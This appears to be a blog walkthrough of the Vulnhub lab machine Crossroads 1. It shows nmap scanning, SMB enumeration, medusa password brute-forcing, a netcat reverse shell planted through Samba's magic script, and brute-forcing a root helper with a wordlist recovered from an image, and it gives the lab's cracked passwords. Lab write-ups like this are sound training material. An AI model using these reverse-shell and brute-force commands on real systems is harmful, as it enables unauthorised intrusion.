Crossroads 1 Vulnhub Walkthrough

This is a writeup for Vulnhub Machine Crossroads 1 which was released by tasiyanci.

Level : Beginner / Intermediate

Goal: Find user flag and root flag

Machine Discovery :

First we will use nmap -sn 192.168.0.0/24 to discover the machine in our network. (I have assigned an IP of 192.168.0.0/24 range to my machine)

nmap -sn 192.168.0.0/24

Port Scanning:

Once the machine is discovered, we will do a port scan using nmap

nmap -A -T4 -p- 192.168.0.112

Exploiting User Flag:

We can see that Port 80(HTTP), Port 139 and Port 445 (SMB) are open

We can try checking the website, but no luck on it

Next we can try enumerating the smb using SMBCLIENT

Keep the password blank

smbclient -L \\\\192.168.0.112

We can see that there is a folder called smbshare

We will use enum4linux for more information about smb

enum4linux 192.168.0.112

We found a user albert

Now we need to crack the password for albert. I have used medusa for this

medusa -h 192.168.0.112 -u ‘albert’ -P /usr/share/wordlists/rockyou.txt -M smbnt

We found the password as bradley1

Now lets try to log in to smb with username albert and password bradley1

Use ls to list the files present

smbclient //192.168.0.112/albert -U albert

And we got our User Flag!

Download the rest of files using get

cd into the smbshare directory and download the smb.conf file

Exploiting Root Flag:

We have a file named beroot, an image name crossroads.png, smb conf file and the user flag

Lets open the smb.conf file and scroll to the end of the file

We can see a magic script = smbscript.sh along with other details

cat smb.conf

We will create our own smbscript.sh and we will write our netcat reverse shell code in it

echo ‘nc -e /bin/bash 192.168.0.112 4444’ > smbscript.sh

Change its permission to 777 and log in to smb with user albert and the path of smbshare

smbclient //192.168.0.112/smbshare -U albert

Open a nc reverse shell on your terminal and then upload the smbscript.sh file using put

And we got our reverse shell!

nc -nvlp 4444

Change the terminal to bash using Python

python -c ‘import pty;pty.spawn(“/bin/bash”)’

We will check for Sudo permissions for user albert

find / -type f -perm -4000 -exec ls -l {} ; 2>/dev/null

We can see /beroot which we saw earlier in the smb

Lets open the beroot file using cat

cat beroot

We can see /bin/bash /root/beroot.sh which is the program to get root

./beroot

If we try to execute the program, we need the root password to login

Lets go back to our Crossroads folder on our Attack Machine and examine crossroads.png

We can use stego tools to examine the .png file

I have used stegoveritas

stegoveritas crossroads.png

It will take time. Once completed it will create a folder called results

Lets cd into results and go to the keepers folder

We can see multiple files here. If we try to open the first file, we can see a wordlist

Lets save this file as wordlist.txt

Send the file using python http server to the victim

We need to bruteforce the password. I have used the below script

for i in $(cat wordlist.txt); do echo $i | ./beroot; done

It will keep bruteforcing the password and once completed use ls

You will see a file called rootcreds

Open the file using cat

cat rootcreds

And you got your root password!

Lets login with root and password as ___drifting___ using su

Post login go to the root folder you will get the root flag!

cat root.txt

Thanks for reading! :)

Please let me know if you have any queries or suggestions.